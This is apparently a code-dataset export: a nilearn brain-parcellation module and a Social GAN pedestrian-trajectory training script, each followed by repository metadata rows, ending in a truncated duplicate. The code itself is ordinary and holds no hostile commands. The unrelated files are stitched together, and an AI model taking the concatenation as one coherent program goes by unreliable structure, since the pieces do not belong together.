region_signals = Parallel(n_jobs=self.n_jobs)(
delayed(self._cache(_labels_masker_extraction,
func_memory_level=2))
(img, masker, confound)
for img, confound in zip(imgs_list, confounds))
if single_subject:
return region_signals[0]
else:
return region_signals
def fit_transform(self, imgs, confounds=None):
"""Fit the images to parcellations and then transform them.
Parameters
----------
imgs: List of Nifti-like images
See http://nilearn.github.io/manipulating_images/input_output.html.
            Images to process, both for fit and for transform to signals.
confounds: List of CSV files or arrays-like, optional
Each file or numpy array in a list should have shape
(number of scans, number of confounds).
This parameter is passed to signal.clean. Given confounds
should have same length as images if given as a list.
            Note: the same confounds will be used for cleaning signals
            before learning parcellations.
Returns
-------
region_signals: List of or 2D numpy.ndarray
Signals extracted for each label for each image.
            For example, for a single image the shape will be
            (number of scans, number of labels).
"""
return self.fit(imgs, confounds=confounds).transform(imgs, confounds)
def inverse_transform(self, signals):
"""Transform signals extracted from parcellations back to brain
images.
Uses `labels_img_` (parcellations) built at fit() level.
Parameters
----------
signals: List of 2D numpy.ndarray
Each 2D array with shape (number of scans, number of regions)
Returns
-------
imgs: List of or Nifti-like image
Brain image(s)
"""
from .signal_extraction import signals_to_img_labels
self._check_fitted()
if not isinstance(signals, (list, tuple)) or\
isinstance(signals, np.ndarray):
signals = [signals, ]
single_subject = True
elif isinstance(signals, (list, tuple)) and len(signals) == 1:
single_subject = True
else:
single_subject = False
imgs = Parallel(n_jobs=self.n_jobs)(
delayed(self._cache(signals_to_img_labels, func_memory_level=2))
(each_signal, self.labels_img_, self.mask_img_)
for each_signal in signals)
if single_subject:
return imgs[0]
else:
return imgs
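# Minimal usage sketch (illustrative; assumes this module's public
# fit/transform API and a list of 4D Niimg-like images `func_imgs`):
#
#     parcel = Parcellations(method='ward', n_parcels=100)
#     parcel.fit(func_imgs)
#     signals = parcel.transform(func_imgs)          # per-parcel time series
#     imgs_back = parcel.inverse_transform(signals)  # back to brain space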
| 38.746479
| 79
| 0.615568
|
import numpy as np
from sklearn.base import clone
from sklearn.feature_extraction import image
from sklearn.externals.joblib import Memory, delayed, Parallel
from .rena_clustering import ReNA
from ..decomposition.multi_pca import MultiPCA
from ..input_data import NiftiLabelsMasker
from .._utils.compat import _basestring
from .._utils.niimg import _safe_get_data
from .._utils.niimg_conversions import _iter_check_niimg
def _estimator_fit(data, estimator, method=None):
if method == 'rena':
rena = ReNA(mask_img=estimator.mask_img,
n_clusters=estimator.n_clusters,
scaling=estimator.scaling,
n_iter=estimator.n_iter,
threshold=estimator.threshold,
memory=estimator.memory,
memory_level=estimator.memory_level,
verbose=estimator.verbose)
rena.fit(data)
labels_ = rena.labels_
else:
estimator = clone(estimator)
estimator.fit(data.T)
labels_ = estimator.labels_
return labels_
def _check_parameters_transform(imgs, confounds):
if not isinstance(imgs, (list, tuple)) or \
isinstance(imgs, _basestring):
imgs = [imgs, ]
single_subject = True
elif isinstance(imgs, (list, tuple)) and len(imgs) == 1:
single_subject = True
else:
single_subject = False
if confounds is None and isinstance(imgs, (list, tuple)):
confounds = [None] * len(imgs)
if confounds is not None:
if not isinstance(confounds, (list, tuple)) or \
isinstance(confounds, _basestring):
confounds = [confounds, ]
if len(confounds) != len(imgs):
raise ValueError("Number of confounds given does not match with "
"the given number of images.")
return imgs, confounds, single_subject
def _labels_masker_extraction(img, masker, confound):
masker = clone(masker)
signals = masker.fit_transform(img, confounds=confound)
return signals
class Parcellations(MultiPCA):
VALID_METHODS = ['kmeans', 'ward', 'complete', 'average', 'rena']
def __init__(self, method, n_parcels=50,
random_state=0, mask=None, smoothing_fwhm=4.,
standardize=False, detrend=False,
low_pass=None, high_pass=None, t_r=None,
target_affine=None, target_shape=None,
mask_strategy='epi', mask_args=None,
scaling=False, n_iter=10,
memory=Memory(cachedir=None),
memory_level=0, n_jobs=1, verbose=1):
self.method = method
self.n_parcels = n_parcels
self.scaling = scaling
self.n_iter = n_iter
MultiPCA.__init__(self, n_components=200,
random_state=random_state,
mask=mask, memory=memory,
smoothing_fwhm=smoothing_fwhm,
standardize=standardize, detrend=detrend,
low_pass=low_pass, high_pass=high_pass,
t_r=t_r, target_affine=target_affine,
target_shape=target_shape,
mask_strategy=mask_strategy,
mask_args=mask_args,
memory_level=memory_level,
n_jobs=n_jobs,
verbose=verbose)
def _raw_fit(self, data):
valid_methods = self.VALID_METHODS
if self.method is None:
raise ValueError("Parcellation method is specified as None. "
"Please select one of the method in "
"{0}".format(valid_methods))
if self.method is not None and self.method not in valid_methods:
raise ValueError("The method you have selected is not implemented "
"'{0}'. Valid methods are in {1}"
.format(self.method, valid_methods))
try:
from nilearn import plotting
except Exception:
pass
components = MultiPCA._raw_fit(self, data)
mask_img_ = self.masker_.mask_img_
if self.verbose:
print("[{0}] computing {1}".format(self.__class__.__name__,
self.method))
if self.method == 'kmeans':
from sklearn.cluster import MiniBatchKMeans
kmeans = MiniBatchKMeans(n_clusters=self.n_parcels,
init='k-means++',
random_state=self.random_state,
verbose=max(0, self.verbose - 1))
labels = self._cache(_estimator_fit,
func_memory_level=1)(components.T, kmeans)
elif self.method == 'rena':
rena = ReNA(mask_img_, n_clusters=self.n_parcels,
scaling=self.scaling, n_iter=self.n_iter,
memory=self.memory, memory_level=self.memory_level,
verbose=max(0, self.verbose - 1))
method = 'rena'
labels = \
self._cache(_estimator_fit, func_memory_level=1)(components.T,
rena, method)
else:
mask_ = _safe_get_data(mask_img_).astype(np.bool)
shape = mask_.shape
connectivity = image.grid_to_graph(n_x=shape[0], n_y=shape[1],
n_z=shape[2], mask=mask_)
from sklearn.cluster import AgglomerativeClustering
agglomerative = AgglomerativeClustering(
n_clusters=self.n_parcels, connectivity=connectivity,
linkage=self.method, memory=self.memory)
labels = self._cache(_estimator_fit,
func_memory_level=1)(components.T,
agglomerative)
self.connectivity_ = connectivity
labels = labels + 1
self.labels_img_ = self.masker_.inverse_transform(labels)
return self
def _check_fitted(self):
if not hasattr(self, 'labels_img_'):
raise ValueError("Object has no labels_img_ attribute. "
"Ensure that fit() is called before transform.")
def transform(self, imgs, confounds=None):
self._check_fitted()
imgs, confounds, single_subject = _check_parameters_transform(
imgs, confounds)
imgs_list = _iter_check_niimg(imgs, atleast_4d=True)
masker = NiftiLabelsMasker(self.labels_img_,
mask_img=self.masker_.mask_img_,
smoothing_fwhm=self.smoothing_fwhm,
standardize=self.standardize,
detrend=self.detrend,
low_pass=self.low_pass,
high_pass=self.high_pass, t_r=self.t_r,
resampling_target='data',
memory=self.memory,
memory_level=self.memory_level,
verbose=self.verbose)
region_signals = Parallel(n_jobs=self.n_jobs)(
delayed(self._cache(_labels_masker_extraction,
func_memory_level=2))
(img, masker, confound)
for img, confound in zip(imgs_list, confounds))
if single_subject:
return region_signals[0]
else:
return region_signals
def fit_transform(self, imgs, confounds=None):
return self.fit(imgs, confounds=confounds).transform(imgs, confounds)
def inverse_transform(self, signals):
from .signal_extraction import signals_to_img_labels
self._check_fitted()
if not isinstance(signals, (list, tuple)) or\
isinstance(signals, np.ndarray):
signals = [signals, ]
single_subject = True
elif isinstance(signals, (list, tuple)) and len(signals) == 1:
single_subject = True
else:
single_subject = False
imgs = Parallel(n_jobs=self.n_jobs)(
delayed(self._cache(signals_to_img_labels, func_memory_level=2))
(each_signal, self.labels_img_, self.mask_img_)
for each_signal in signals)
if single_subject:
return imgs[0]
else:
return imgs
| true
| true
|
1c4932ee7a5e84c853b683328353f9c0b6b2e71a
| 22,244
|
py
|
Python
|
scripts/train.py
|
LucasPagano/sga-
|
5b4b88ebf826c2be022f34eb66d5a712b911724a
|
[
"MIT"
] | null | null | null |
scripts/train.py
|
LucasPagano/sga-
|
5b4b88ebf826c2be022f34eb66d5a712b911724a
|
[
"MIT"
] | null | null | null |
scripts/train.py
|
LucasPagano/sga-
|
5b4b88ebf826c2be022f34eb66d5a712b911724a
|
[
"MIT"
] | null | null | null |
import argparse
import gc
import logging
import os
import sys
import time
from collections import defaultdict
import torch
import torch.nn as nn
import torch.optim as optim
from sgan.data.loader import data_loader
from sgan.losses import gan_g_loss, gan_d_loss, l2_loss
from sgan.losses import displacement_error, final_displacement_error
from sgan.models import TrajectoryGenerator, TrajectoryDiscriminator
from sgan.utils import int_tuple, bool_flag, get_total_norm
from sgan.utils import relative_to_abs, get_dset_path
torch.backends.cudnn.benchmark = True
parser = argparse.ArgumentParser()
FORMAT = '[%(levelname)s: %(filename)s: %(lineno)4d]: %(message)s'
logging.basicConfig(level=logging.INFO, format=FORMAT, stream=sys.stdout)
logger = logging.getLogger(__name__)
# Dataset options
parser.add_argument('--dataset_name', default='trajectory_forecasting_benchmark', type=str)
parser.add_argument('--delim', default=' ')
parser.add_argument('--loader_num_workers', default=4, type=int)
parser.add_argument('--obs_len', default=8, type=int)
parser.add_argument('--pred_len', default=8, type=int)
parser.add_argument('--skip', default=1, type=int)
# Optimization
parser.add_argument('--batch_size', default=32, type=int)
parser.add_argument('--num_iterations', default=10000, type=int)
parser.add_argument('--num_epochs', default=200, type=int)
# Model Options
parser.add_argument('--embedding_dim', default=16, type=int)
parser.add_argument('--num_layers', default=1, type=int)
parser.add_argument('--dropout', default=0, type=float)
parser.add_argument('--batch_norm', default=0, type=bool_flag)
parser.add_argument('--mlp_dim', default=64, type=int)
# Generator Options
parser.add_argument('--encoder_h_dim_g', default=32, type=int)
parser.add_argument('--decoder_h_dim_g', default=64, type=int)
parser.add_argument('--noise_dim', default=8, type=int_tuple)
parser.add_argument('--noise_type', default='gaussian')
parser.add_argument('--noise_mix_type', default='global')
parser.add_argument('--clipping_threshold_g', default=1.5, type=float)
parser.add_argument('--g_learning_rate', default=1e-3, type=float)
parser.add_argument('--g_steps', default=1, type=int)
# Pooling Options
parser.add_argument('--pooling_type', default='pool_net')
parser.add_argument('--pool_every_timestep', default=0, type=bool_flag)
# Pool Net Option
parser.add_argument('--bottleneck_dim', default=32, type=int)
# Social Pooling Options
parser.add_argument('--neighborhood_size', default=2.0, type=float)
parser.add_argument('--grid_size', default=8, type=int)
# Discriminator Options
parser.add_argument('--d_type', default='local', type=str)
parser.add_argument('--encoder_h_dim_d', default=64, type=int)
parser.add_argument('--d_learning_rate', default=1e-3, type=float)
parser.add_argument('--d_steps', default=2, type=int)
parser.add_argument('--clipping_threshold_d', default=0, type=float)
# Loss Options
parser.add_argument('--l2_loss_weight', default=1, type=float)
parser.add_argument('--best_k', default=10, type=int)
# Output
parser.add_argument('--output_dir', default=os.getcwd())
parser.add_argument('--print_every', default=50, type=int)
parser.add_argument('--checkpoint_every', default=100, type=int)
parser.add_argument('--checkpoint_name', default='checkpoint')
parser.add_argument('--checkpoint_start_from', default=None)
parser.add_argument('--restore_from_checkpoint', default=0, type=int)
parser.add_argument('--num_samples_check', default=5000, type=int)
# Misc
parser.add_argument('--use_gpu', default=1, type=int)
parser.add_argument('--timing', default=0, type=int)
parser.add_argument('--gpu_num', default="0", type=str)
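# Typical invocation (illustrative; assumes the dataset is laid out where
# get_dset_path expects it, and the dataset name is a placeholder):
#
#     python scripts/train.py --dataset_name zara1 --num_epochs 200 --batch_size 32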
def init_weights(m):
classname = m.__class__.__name__
if classname.find('Linear') != -1:
nn.init.kaiming_normal_(m.weight)
def get_dtypes(args):
long_dtype = torch.LongTensor
float_dtype = torch.FloatTensor
if args.use_gpu == 1:
long_dtype = torch.cuda.LongTensor
float_dtype = torch.cuda.FloatTensor
return long_dtype, float_dtype
def main(args):
os.environ["CUDA_VISIBLE_DEVICES"] = args.gpu_num
train_path = get_dset_path(args.dataset_name, 'train')
val_path = get_dset_path(args.dataset_name, 'val')
long_dtype, float_dtype = get_dtypes(args)
logger.info("Initializing train dataset")
train_dset, train_loader = data_loader(args, train_path)
logger.info("Initializing val dataset")
_, val_loader = data_loader(args, val_path)
iterations_per_epoch = len(train_dset) / args.batch_size / args.d_steps
if args.num_epochs:
args.num_iterations = int(iterations_per_epoch * args.num_epochs)
logger.info(
'There are {} iterations per epoch'.format(iterations_per_epoch)
)
generator = TrajectoryGenerator(
obs_len=args.obs_len,
pred_len=args.pred_len,
embedding_dim=args.embedding_dim,
encoder_h_dim=args.encoder_h_dim_g,
decoder_h_dim=args.decoder_h_dim_g,
mlp_dim=args.mlp_dim,
num_layers=args.num_layers,
noise_dim=args.noise_dim,
noise_type=args.noise_type,
noise_mix_type=args.noise_mix_type,
pooling_type=args.pooling_type,
pool_every_timestep=args.pool_every_timestep,
dropout=args.dropout,
bottleneck_dim=args.bottleneck_dim,
neighborhood_size=args.neighborhood_size,
grid_size=args.grid_size,
batch_norm=args.batch_norm)
generator.apply(init_weights)
generator.type(float_dtype).train()
logger.info('Here is the generator:')
logger.info(generator)
discriminator = TrajectoryDiscriminator(
obs_len=args.obs_len,
pred_len=args.pred_len,
embedding_dim=args.embedding_dim,
h_dim=args.encoder_h_dim_d,
mlp_dim=args.mlp_dim,
num_layers=args.num_layers,
dropout=args.dropout,
batch_norm=args.batch_norm,
d_type=args.d_type)
discriminator.apply(init_weights)
discriminator.type(float_dtype).train()
logger.info('Here is the discriminator:')
logger.info(discriminator)
g_loss_fn = gan_g_loss
d_loss_fn = gan_d_loss
optimizer_g = optim.Adam(generator.parameters(), lr=args.g_learning_rate)
optimizer_d = optim.Adam(
discriminator.parameters(), lr=args.d_learning_rate
)
# Maybe restore from checkpoint
restore_path = None
if args.checkpoint_start_from is not None:
restore_path = args.checkpoint_start_from
elif args.restore_from_checkpoint == 1:
restore_path = os.path.join(args.output_dir,
'%s_with_model.pt' % args.checkpoint_name)
if restore_path is not None and os.path.isfile(restore_path):
logger.info('Restoring from checkpoint {}'.format(restore_path))
checkpoint = torch.load(restore_path)
generator.load_state_dict(checkpoint['g_state'])
discriminator.load_state_dict(checkpoint['d_state'])
optimizer_g.load_state_dict(checkpoint['g_optim_state'])
optimizer_d.load_state_dict(checkpoint['d_optim_state'])
t = checkpoint['counters']['t']
epoch = checkpoint['counters']['epoch']
checkpoint['restore_ts'].append(t)
else:
# Starting from scratch, so initialize checkpoint data structure
t, epoch = 0, 0
checkpoint = {
'args': args.__dict__,
'G_losses': defaultdict(list),
'D_losses': defaultdict(list),
'losses_ts': [],
'metrics_val': defaultdict(list),
'metrics_train': defaultdict(list),
'sample_ts': [],
'restore_ts': [],
'norm_g': [],
'norm_d': [],
'counters': {
't': None,
'epoch': None,
},
'g_state': None,
'g_optim_state': None,
'd_state': None,
'd_optim_state': None,
'g_best_state': None,
'd_best_state': None,
'best_t': None,
'g_best_nl_state': None,
'd_best_state_nl': None,
'best_t_nl': None,
}
t0 = None
while t < args.num_iterations:
gc.collect()
d_steps_left = args.d_steps
g_steps_left = args.g_steps
epoch += 1
logger.info('Starting epoch {}'.format(epoch))
for batch in train_loader:
if args.timing == 1:
torch.cuda.synchronize()
t1 = time.time()
# Decide whether to use the batch for stepping on discriminator or
# generator; an iteration consists of args.d_steps steps on the
# discriminator followed by args.g_steps steps on the generator.
if d_steps_left > 0:
step_type = 'd'
losses_d = discriminator_step(args, batch, generator,
discriminator, d_loss_fn,
optimizer_d)
checkpoint['norm_d'].append(
get_total_norm(discriminator.parameters()))
d_steps_left -= 1
elif g_steps_left > 0:
step_type = 'g'
losses_g = generator_step(args, batch, generator,
discriminator, g_loss_fn,
optimizer_g)
checkpoint['norm_g'].append(
get_total_norm(generator.parameters())
)
g_steps_left -= 1
if args.timing == 1:
torch.cuda.synchronize()
t2 = time.time()
logger.info('{} step took {}'.format(step_type, t2 - t1))
# Skip the rest if we are not at the end of an iteration
if d_steps_left > 0 or g_steps_left > 0:
continue
if args.timing == 1:
if t0 is not None:
                    logger.info('Iteration {} took {}'.format(
t - 1, time.time() - t0
))
t0 = time.time()
# Maybe save loss
if t % args.print_every == 0:
logger.info('t = {} / {}'.format(t + 1, args.num_iterations))
for k, v in sorted(losses_d.items()):
logger.info(' [D] {}: {:.3f}'.format(k, v))
checkpoint['D_losses'][k].append(v)
for k, v in sorted(losses_g.items()):
logger.info(' [G] {}: {:.3f}'.format(k, v))
checkpoint['G_losses'][k].append(v)
checkpoint['losses_ts'].append(t)
# Maybe save a checkpoint
if t > 0 and t % args.checkpoint_every == 0:
checkpoint['counters']['t'] = t
checkpoint['counters']['epoch'] = epoch
checkpoint['sample_ts'].append(t)
# Check stats on the validation set
logger.info('Checking stats on val ...')
metrics_val = check_accuracy(
args, val_loader, generator, discriminator, d_loss_fn
)
logger.info('Checking stats on train ...')
metrics_train = check_accuracy(
args, train_loader, generator, discriminator,
d_loss_fn, limit=True
)
for k, v in sorted(metrics_val.items()):
logger.info(' [val] {}: {:.3f}'.format(k, v))
checkpoint['metrics_val'][k].append(v)
for k, v in sorted(metrics_train.items()):
logger.info(' [train] {}: {:.3f}'.format(k, v))
checkpoint['metrics_train'][k].append(v)
min_ade = min(checkpoint['metrics_val']['ade'])
min_ade_nl = min(checkpoint['metrics_val']['ade_nl'])
if metrics_val['ade'] == min_ade:
logger.info('New low for avg_disp_error')
checkpoint['best_t'] = t
checkpoint['g_best_state'] = generator.state_dict()
checkpoint['d_best_state'] = discriminator.state_dict()
if metrics_val['ade_nl'] == min_ade_nl:
logger.info('New low for avg_disp_error_nl')
checkpoint['best_t_nl'] = t
checkpoint['g_best_nl_state'] = generator.state_dict()
checkpoint['d_best_nl_state'] = discriminator.state_dict()
# Save another checkpoint with model weights and
# optimizer state
checkpoint['g_state'] = generator.state_dict()
checkpoint['g_optim_state'] = optimizer_g.state_dict()
checkpoint['d_state'] = discriminator.state_dict()
checkpoint['d_optim_state'] = optimizer_d.state_dict()
checkpoint_path = os.path.join(
args.output_dir, '%s_with_model.pt' % args.checkpoint_name
)
logger.info('Saving checkpoint to {}'.format(checkpoint_path))
torch.save(checkpoint, checkpoint_path)
logger.info('Done.')
# Save a checkpoint with no model weights by making a shallow
# copy of the checkpoint excluding some items
checkpoint_path = os.path.join(
args.output_dir, '%s_no_model.pt' % args.checkpoint_name)
logger.info('Saving checkpoint to {}'.format(checkpoint_path))
key_blacklist = [
'g_state', 'd_state', 'g_best_state', 'g_best_nl_state',
'g_optim_state', 'd_optim_state', 'd_best_state',
'd_best_nl_state'
]
small_checkpoint = {}
for k, v in checkpoint.items():
if k not in key_blacklist:
small_checkpoint[k] = v
torch.save(small_checkpoint, checkpoint_path)
logger.info('Done.')
t += 1
d_steps_left = args.d_steps
g_steps_left = args.g_steps
if t >= args.num_iterations:
break
def discriminator_step(
args, batch, generator, discriminator, d_loss_fn, optimizer_d
):
batch = [tensor.cuda() for tensor in batch]
(obs_traj, pred_traj_gt, obs_traj_rel, pred_traj_gt_rel, non_linear_ped,
loss_mask, seq_start_end) = batch
losses = {}
loss = torch.zeros(1).to(pred_traj_gt)
generator_out = generator(obs_traj, obs_traj_rel, seq_start_end)
pred_traj_fake_rel = generator_out
pred_traj_fake = relative_to_abs(pred_traj_fake_rel, obs_traj[-1])
traj_real = torch.cat([obs_traj, pred_traj_gt], dim=0)
traj_real_rel = torch.cat([obs_traj_rel, pred_traj_gt_rel], dim=0)
traj_fake = torch.cat([obs_traj, pred_traj_fake], dim=0)
traj_fake_rel = torch.cat([obs_traj_rel, pred_traj_fake_rel], dim=0)
scores_fake = discriminator(traj_fake, traj_fake_rel, seq_start_end)
scores_real = discriminator(traj_real, traj_real_rel, seq_start_end)
# Compute loss with optional gradient penalty
data_loss = d_loss_fn(scores_real, scores_fake)
losses['D_data_loss'] = data_loss.item()
loss += data_loss
losses['D_total_loss'] = loss.item()
optimizer_d.zero_grad()
loss.backward()
if args.clipping_threshold_d > 0:
nn.utils.clip_grad_norm_(discriminator.parameters(),
args.clipping_threshold_d)
optimizer_d.step()
return losses
def generator_step(
args, batch, generator, discriminator, g_loss_fn, optimizer_g
):
batch = [tensor.cuda() for tensor in batch]
(obs_traj, pred_traj_gt, obs_traj_rel, pred_traj_gt_rel, non_linear_ped,
loss_mask, seq_start_end) = batch
losses = {}
loss = torch.zeros(1).to(pred_traj_gt)
g_l2_loss_rel = []
loss_mask = loss_mask[:, args.obs_len:]
for _ in range(args.best_k):
generator_out = generator(obs_traj, obs_traj_rel, seq_start_end)
pred_traj_fake_rel = generator_out
pred_traj_fake = relative_to_abs(pred_traj_fake_rel, obs_traj[-1])
if args.l2_loss_weight > 0:
g_l2_loss_rel.append(args.l2_loss_weight * l2_loss(
pred_traj_fake_rel,
pred_traj_gt_rel,
loss_mask,
mode='raw'))
g_l2_loss_sum_rel = torch.zeros(1).to(pred_traj_gt)
if args.l2_loss_weight > 0:
g_l2_loss_rel = torch.stack(g_l2_loss_rel, dim=1)
for start, end in seq_start_end.data:
_g_l2_loss_rel = g_l2_loss_rel[start:end]
_g_l2_loss_rel = torch.sum(_g_l2_loss_rel, dim=0)
_g_l2_loss_rel = torch.min(_g_l2_loss_rel) / torch.sum(
loss_mask[start:end])
g_l2_loss_sum_rel += _g_l2_loss_rel
losses['G_l2_loss_rel'] = g_l2_loss_sum_rel.item()
loss += g_l2_loss_sum_rel
traj_fake = torch.cat([obs_traj, pred_traj_fake], dim=0)
traj_fake_rel = torch.cat([obs_traj_rel, pred_traj_fake_rel], dim=0)
scores_fake = discriminator(traj_fake, traj_fake_rel, seq_start_end)
discriminator_loss = g_loss_fn(scores_fake)
loss += discriminator_loss
losses['G_discriminator_loss'] = discriminator_loss.item()
losses['G_total_loss'] = loss.item()
optimizer_g.zero_grad()
loss.backward()
if args.clipping_threshold_g > 0:
nn.utils.clip_grad_norm_(
generator.parameters(), args.clipping_threshold_g
)
optimizer_g.step()
return losses
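# --- Editor's sketch (illustration only, not part of the original file) ---
# The best_k loop above keeps only the L2 loss of the closest of k sampled
# trajectories (the "variety" loss). A self-contained toy version of that
# min-over-k reduction, with made-up shapes:
def _variety_loss_sketch():
    import torch
    preds = torch.randn(10, 8, 2)   # k=10 candidate (seq_len=8, xy) paths
    gt = torch.zeros(8, 2)          # one ground-truth path
    per_sample = ((preds - gt.unsqueeze(0)) ** 2).sum(dim=(1, 2))  # (k,)
    return per_sample.min()         # only the best sample is penalized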
def check_accuracy(
args, loader, generator, discriminator, d_loss_fn, limit=False
):
d_losses = []
metrics = {}
    # Use distinct list objects; ``([],) * n`` would bind every name to the
    # same list and silently mix the statistics together
    g_l2_losses_abs, g_l2_losses_rel = [], []
    disp_error, disp_error_l, disp_error_nl = [], [], []
    f_disp_error, f_disp_error_l, f_disp_error_nl = [], [], []
total_traj, total_traj_l, total_traj_nl = 0, 0, 0
loss_mask_sum = 0
generator.eval()
with torch.no_grad():
for batch in loader:
batch = [tensor.cuda() for tensor in batch]
(obs_traj, pred_traj_gt, obs_traj_rel, pred_traj_gt_rel,
non_linear_ped, loss_mask, seq_start_end) = batch
linear_ped = 1 - non_linear_ped
loss_mask = loss_mask[:, args.obs_len:]
pred_traj_fake_rel = generator(
obs_traj, obs_traj_rel, seq_start_end
)
pred_traj_fake = relative_to_abs(pred_traj_fake_rel, obs_traj[-1])
g_l2_loss_abs, g_l2_loss_rel = cal_l2_losses(
pred_traj_gt, pred_traj_gt_rel, pred_traj_fake,
pred_traj_fake_rel, loss_mask
)
ade, ade_l, ade_nl = cal_ade(
pred_traj_gt, pred_traj_fake, linear_ped, non_linear_ped
)
fde, fde_l, fde_nl = cal_fde(
pred_traj_gt, pred_traj_fake, linear_ped, non_linear_ped
)
traj_real = torch.cat([obs_traj, pred_traj_gt], dim=0)
traj_real_rel = torch.cat([obs_traj_rel, pred_traj_gt_rel], dim=0)
traj_fake = torch.cat([obs_traj, pred_traj_fake], dim=0)
traj_fake_rel = torch.cat([obs_traj_rel, pred_traj_fake_rel], dim=0)
scores_fake = discriminator(traj_fake, traj_fake_rel, seq_start_end)
scores_real = discriminator(traj_real, traj_real_rel, seq_start_end)
d_loss = d_loss_fn(scores_real, scores_fake)
d_losses.append(d_loss.item())
g_l2_losses_abs.append(g_l2_loss_abs.item())
g_l2_losses_rel.append(g_l2_loss_rel.item())
disp_error.append(ade.item())
disp_error_l.append(ade_l.item())
disp_error_nl.append(ade_nl.item())
f_disp_error.append(fde.item())
f_disp_error_l.append(fde_l.item())
f_disp_error_nl.append(fde_nl.item())
loss_mask_sum += torch.numel(loss_mask.data)
total_traj += pred_traj_gt.size(1)
total_traj_l += torch.sum(linear_ped).item()
total_traj_nl += torch.sum(non_linear_ped).item()
if limit and total_traj >= args.num_samples_check:
break
metrics['d_loss'] = sum(d_losses) / len(d_losses)
metrics['g_l2_loss_abs'] = sum(g_l2_losses_abs) / loss_mask_sum
metrics['g_l2_loss_rel'] = sum(g_l2_losses_rel) / loss_mask_sum
metrics['ade'] = sum(disp_error) / (total_traj * args.pred_len)
metrics['fde'] = sum(f_disp_error) / total_traj
if total_traj_l != 0:
metrics['ade_l'] = sum(disp_error_l) / (total_traj_l * args.pred_len)
metrics['fde_l'] = sum(f_disp_error_l) / total_traj_l
else:
metrics['ade_l'] = 0
metrics['fde_l'] = 0
if total_traj_nl != 0:
metrics['ade_nl'] = sum(disp_error_nl) / (
total_traj_nl * args.pred_len)
metrics['fde_nl'] = sum(f_disp_error_nl) / total_traj_nl
else:
metrics['ade_nl'] = 0
metrics['fde_nl'] = 0
generator.train()
return metrics
def cal_l2_losses(
pred_traj_gt, pred_traj_gt_rel, pred_traj_fake, pred_traj_fake_rel,
loss_mask
):
g_l2_loss_abs = l2_loss(
pred_traj_fake, pred_traj_gt, loss_mask, mode='sum'
)
g_l2_loss_rel = l2_loss(
pred_traj_fake_rel, pred_traj_gt_rel, loss_mask, mode='sum'
)
return g_l2_loss_abs, g_l2_loss_rel
def cal_ade(pred_traj_gt, pred_traj_fake, linear_ped, non_linear_ped):
ade = displacement_error(pred_traj_fake, pred_traj_gt)
ade_l = displacement_error(pred_traj_fake, pred_traj_gt, linear_ped)
ade_nl = displacement_error(pred_traj_fake, pred_traj_gt, non_linear_ped)
return ade, ade_l, ade_nl
def cal_fde(
pred_traj_gt, pred_traj_fake, linear_ped, non_linear_ped
):
fde = final_displacement_error(pred_traj_fake[-1], pred_traj_gt[-1])
fde_l = final_displacement_error(
pred_traj_fake[-1], pred_traj_gt[-1], linear_ped
)
fde_nl = final_displacement_error(
pred_traj_fake[-1], pred_traj_gt[-1], non_linear_ped
)
return fde, fde_l, fde_nl
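# --- Editor's sketch (illustration only) ---
# ADE averages the pointwise displacement over every predicted timestep while
# FDE looks only at the endpoint. A hand-checkable version, assuming the same
# (seq_len, num_peds, 2) layout the helpers above use:
def _ade_fde_sketch():
    import torch
    gt = torch.zeros(8, 3, 2)             # 3 pedestrians, 8 steps
    pred = gt + torch.tensor([1.0, 0.0])  # every point is 1 unit off in x
    dist = ((pred - gt) ** 2).sum(dim=2).sqrt()  # (seq_len, num_peds)
    ade, fde = dist.mean(), dist[-1].mean()
    assert ade == 1.0 and fde == 1.0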
if __name__ == '__main__':
args = parser.parse_args()
main(args)
| 38.351724
| 91
| 0.630507
|
import argparse
import gc
import logging
import os
import sys
import time
from collections import defaultdict
import torch
import torch.nn as nn
import torch.optim as optim
from sgan.data.loader import data_loader
from sgan.losses import gan_g_loss, gan_d_loss, l2_loss
from sgan.losses import displacement_error, final_displacement_error
from sgan.models import TrajectoryGenerator, TrajectoryDiscriminator
from sgan.utils import int_tuple, bool_flag, get_total_norm
from sgan.utils import relative_to_abs, get_dset_path
torch.backends.cudnn.benchmark = True
parser = argparse.ArgumentParser()
FORMAT = '[%(levelname)s: %(filename)s: %(lineno)4d]: %(message)s'
logging.basicConfig(level=logging.INFO, format=FORMAT, stream=sys.stdout)
logger = logging.getLogger(__name__)
parser.add_argument('--dataset_name', default='trajectory_forecasting_benchmark', type=str)
parser.add_argument('--delim', default=' ')
parser.add_argument('--loader_num_workers', default=4, type=int)
parser.add_argument('--obs_len', default=8, type=int)
parser.add_argument('--pred_len', default=8, type=int)
parser.add_argument('--skip', default=1, type=int)
parser.add_argument('--batch_size', default=32, type=int)
parser.add_argument('--num_iterations', default=10000, type=int)
parser.add_argument('--num_epochs', default=200, type=int)
parser.add_argument('--embedding_dim', default=16, type=int)
parser.add_argument('--num_layers', default=1, type=int)
parser.add_argument('--dropout', default=0, type=float)
parser.add_argument('--batch_norm', default=0, type=bool_flag)
parser.add_argument('--mlp_dim', default=64, type=int)
parser.add_argument('--encoder_h_dim_g', default=32, type=int)
parser.add_argument('--decoder_h_dim_g', default=64, type=int)
parser.add_argument('--noise_dim', default=8, type=int_tuple)
parser.add_argument('--noise_type', default='gaussian')
parser.add_argument('--noise_mix_type', default='global')
parser.add_argument('--clipping_threshold_g', default=1.5, type=float)
parser.add_argument('--g_learning_rate', default=1e-3, type=float)
parser.add_argument('--g_steps', default=1, type=int)
parser.add_argument('--pooling_type', default='pool_net')
parser.add_argument('--pool_every_timestep', default=0, type=bool_flag)
parser.add_argument('--bottleneck_dim', default=32, type=int)
parser.add_argument('--neighborhood_size', default=2.0, type=float)
parser.add_argument('--grid_size', default=8, type=int)
parser.add_argument('--d_type', default='local', type=str)
parser.add_argument('--encoder_h_dim_d', default=64, type=int)
parser.add_argument('--d_learning_rate', default=1e-3, type=float)
parser.add_argument('--d_steps', default=2, type=int)
parser.add_argument('--clipping_threshold_d', default=0, type=float)
parser.add_argument('--l2_loss_weight', default=1, type=float)
parser.add_argument('--best_k', default=10, type=int)
parser.add_argument('--output_dir', default=os.getcwd())
parser.add_argument('--print_every', default=50, type=int)
parser.add_argument('--checkpoint_every', default=100, type=int)
parser.add_argument('--checkpoint_name', default='checkpoint')
parser.add_argument('--checkpoint_start_from', default=None)
parser.add_argument('--restore_from_checkpoint', default=0, type=int)
parser.add_argument('--num_samples_check', default=5000, type=int)
parser.add_argument('--use_gpu', default=1, type=int)
parser.add_argument('--timing', default=0, type=int)
parser.add_argument('--gpu_num', default="0", type=str)
def init_weights(m):
classname = m.__class__.__name__
if classname.find('Linear') != -1:
